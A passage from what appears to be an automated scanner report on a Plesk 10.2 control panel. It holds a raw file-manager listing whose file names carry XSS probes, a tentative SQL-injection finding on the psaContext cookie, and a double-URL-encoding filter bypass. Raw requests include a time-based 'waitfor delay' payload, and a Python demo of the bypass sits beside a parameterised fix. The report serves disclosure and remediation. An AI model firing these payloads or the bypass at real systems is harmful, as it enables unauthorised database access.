alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPG" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPG" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_3M.COM-XSS-1.JPGfdf080d921773c427dce8684" value="3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="return 
bin();;lon();">3M.COM-XSS-1.JPGfdf080d921773c427dce8684</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_673db%2522a%253d%2522b%25226c91d8a7d6d" value="673db%2522a%253d%2522b%25226c91d8a7d6d" 
onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, 
&quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" 
onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A 
href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG 
src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return 
false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/ [psaContext cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/create-file/

Issue detail

The psaContext cookie appears to be vulnerable to SQL injection. A single quote was submitted in the psaContext cookie and a general error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present: in Response 1 below, the error returned for the double-encoded probe is the panel's generic "Invalid URL was requested." message and the server re-issues "Set-Cookie: psaContext=dashboard", which is equally consistent with input validation rejecting the value, so the finding stays at Tentative confidence until a boolean or time-based probe shows database-dependent behaviour.

The application attempts to block SQL injection, but the block can be circumvented by double URL-encoding the blocked character: submitting %2527 instead of ' (Request 1 below sends psaContext=dashboard%2527). The web server decodes this once, to %27, which passes a filter that looks for a literal quote; the application's own second decode then turns it into '.

Remediation detail

There is probably no need to perform a second URL-decode of the psaContext cookie value, since the web server has already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the filter sees the same bytes the database does, and should pass the value to the database only through a parameterised query rather than string concatenation.
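The filter bypass and the fix, as an added example that is not part of the XSS.CX report or of Plesk's code. It is written in Python against an in-memory SQLite table; the table, its rows and the context-name allowlist are constructed for illustration, since the real query behind psaContext is not shown on this page. vulnerable_lookup validates the cookie before its own second URL-decode and concatenates the result into SQL, so a single-encoded quote is rejected but %2527 reaches the query as a literal quote; hardened_lookup validates the once-decoded value against an allowlist and binds it as a parameter.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed sample data standing in for whatever table a psaContext lookup reaches.
def _connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contexts (name TEXT, owner TEXT)")
    conn.executemany(
        "INSERT INTO contexts VALUES (?, ?)",
        [("dashboard", "client2"), ("mail", "client2"), ("admin", "admin")],
    )
    return conn


def server_decode(raw_cookie: str) -> str:
    """The single URL-decode the web server applies before the app sees the cookie."""
    return unquote(raw_cookie)


def naive_filter(value: str) -> None:
    """Filter that rejects a literal single quote, the character the report says is blocked."""
    if "'" in value:
        raise ValueError("Invalid URL was requested.")


def vulnerable_lookup(raw_cookie: str) -> list:
    """Validate, then decode a second time, then build the SQL by concatenation."""
    once = server_decode(raw_cookie)   # %2527 -> %27 (filter sees no quote); %27 -> '
    naive_filter(once)
    twice = unquote(once)              # the app's own second decode: %27 -> '
    sql = f"SELECT name FROM contexts WHERE name = '{twice}'"
    return _connect().execute(sql).fetchall()


# Assumed allowlist for a context name; the real format is not given on this page.
_CONTEXT_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def hardened_lookup(raw_cookie: str) -> list:
    """Decode once (the server already did), validate the canonical value, bind parameters."""
    value = server_decode(raw_cookie)
    if not _CONTEXT_NAME.fullmatch(value):   # a leftover %27 and a literal ' both fail here
        raise ValueError("Invalid URL was requested.")
    return _connect().execute(
        "SELECT name FROM contexts WHERE name = ?", (value,)
    ).fetchall()


def rejects(lookup, raw_cookie: str) -> bool:
    """True when the lookup refuses the value (the 'general error' the scanner observed)."""
    try:
        lookup(raw_cookie)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "dashboard%2527%20OR%201%3D1--"   # double-encoded quote, then a tautology
    print("single-encoded quote rejected:", rejects(vulnerable_lookup, "dashboard%27"))
    print("double-encoded payload, vulnerable:", vulnerable_lookup(payload))
    print("double-encoded payload, hardened rejected:", rejects(hardened_lookup, payload))
```

Run it as a script to see the vulnerable lookup return every row for the double-encoded payload while the single-encoded quote is blocked, which is exactly the asymmetry the scanner's probes rely on; the hardened version rejects both because it validates the value the server actually delivered and never decodes it again.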

Request 1

GET /plesk/client@2/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard%2527; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 1

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:36:27 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:36:29 GMT
Connection: close
Content-Length: 93878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%27%2C0%2C0%2C0%29waitfor%2520delay%270%253a0%253a20%27--%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
